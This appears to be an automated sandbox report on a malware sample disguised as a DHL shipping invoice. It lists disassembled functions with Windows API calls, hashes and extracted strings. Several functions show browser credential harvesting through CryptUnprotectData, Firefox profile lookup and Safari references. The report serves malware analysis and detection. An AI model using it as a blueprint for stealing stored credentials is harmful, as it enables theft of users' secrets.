                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3604893535-0
                                                                                                                                                                                                                                      • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                      • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1213725291-0
                                                                                                                                                                                                                                      • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                      • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                                                                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418370
                                                                                                                                                                                                                                        • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,757BDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                                                                        • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                                      • API String ID: 2360000266-2664311388
                                                                                                                                                                                                                                      • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1865533344-0
                                                                                                                                                                                                                                      • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                      • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                                                                                      • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                      • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                                      • API String ID: 2929817778-1134094380
                                                                                                                                                                                                                                      • Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                                      • Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                                      • Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413292
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413310
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                                                                      • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                                                                      • API String ID: 4111938811-1819279800
                                                                                                                                                                                                                                      • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                      • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                                                                      • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 829165378-0
                                                                                                                                                                                                                                      • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                      • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000005.00000002.423701774240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000005.00000002.423701774240.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                                                                      • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                                                                      • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                      • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                      • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,?), ref: 004115FE
